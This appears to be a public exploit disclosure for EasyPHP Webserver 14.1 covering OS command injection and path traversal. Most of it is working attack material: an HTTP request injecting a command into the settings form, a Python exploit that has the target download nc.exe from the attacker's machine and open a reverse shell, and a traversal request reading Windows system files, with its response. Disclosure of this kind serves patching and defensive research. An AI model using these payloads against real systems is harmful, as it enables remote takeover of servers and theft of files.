EasyPHP Webserver 14.1 Path Traversal / Remote Code Execution

`# Exploit Title: EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and  
Path Traversal)  
# Discovery by: Rafael Pedrero  
# Discovery Date: 2022-02-06  
# Vendor Homepage: https://www.easyphp.org/  
# Software Link : https://www.easyphp.org/  
# Tested Version: 14.1  
# Tested on: Windows 7 and 10  
  
# Vulnerability Type: Remote Command Execution (RCE)  
  
CVSS v3: 9.8  
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  
CWE: CWE-78  
  
Vulnerability description: There is an OS Command Injection in EasyPHP  
Webserver 14.1 that allows an attacker to achieve Remote Code Execution  
(RCE) with administrative privileges.  
  
Proof of concept:  
  
To detect:  
  
POST http://127.0.0.1:10000/index.php?zone=settings HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 28  
Origin: http://127.0.0.1:10000  
Connection: keep-alive  
Referer: http://127.0.0.1:10000/index.php?zone=settings  
Host: 127.0.0.1:10000  
  
app_service_control=calc.exe  
  
The calculator opens.  
  
Exploit:  
  
# !/usr/bin/python3  
import requests  
import sys  
  
if len(sys.argv) != 5:  
print("RCE: EasyPHP Webserver 14.1 and before - by Rafa")  
print("Usage: %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>" %  
sys.argv[0])  
print("Example: %s 192.168.1.10 10000 192.168.1.11 9001" %  
sys.argv[0])  
exit(1)  
  
else:  
target = sys.argv[1]  
targetport = sys.argv[2]  
localip = sys.argv[3]  
localport = sys.argv[4]  
# python3 -m http.server / python2 -m SimpleHTTPServer with nc.exe in  
the directory  
  
payload =  
"powershell+-command+\"((new-object+System.Net.WebClient).DownloadFile('http://"  
+ localip + ':8000' +  
"/nc.exe','%TEMP%\\nc.exe'))\";\"c:\windows\\system32\\cmd.exe+/c+%TEMP%\\nc.exe+"  
+ localip + "+" + localport + "+-e+cmd.exe\""  
print (payload)  
url = 'http://' + target + ':' + targetport + '/index.php?zone=settings'  
headers = {  
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4433.0 Safari/537.36"  
}  
data = {'app_service_control':payload}  
  
try:  
r = requests.post(url, headers=headers, data=data)  
except requests.exceptions.ReadTimeout:  
print("The payload has been sent. Check it!")  
pass  
  
  
# Vulnerability Type: Path Traversal  
  
CVSS v3: 6.5  
CVSS vector: 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N  
CWE: CWE-22  
  
Vulnerability description: An issue was discovered in EasyPHP Webserver  
14.1. An Absolute Path Traversal vulnerability in / allows remote users to  
bypass intended SecurityManager restrictions and download any file if you  
have adequate permissions outside the documentroot configured on the server.  
  
Proof of concept:  
  
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini  
HTTP/1.1  
Host: 192.168.X.X:10000  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,  
like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*  
  
HTTP/1.1 200 OK  
Host: 192.168.X.X:10000  
Connection: close  
Content-Type: application/octet-stream  
Content-Length: 499  
  
; for 16-bit app support [fonts] [extensions] [mci extensions] [files]  
[Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMCDLLNAME=mapi.dll CMC=1 MAPIX=1  
MAPIXVER=1.0.0.1 OLEMessaging=1 [MCI Extensions.BAK] 3g2=MPEGVideo  
3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo  
adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo  
m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo  
mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo  
  
`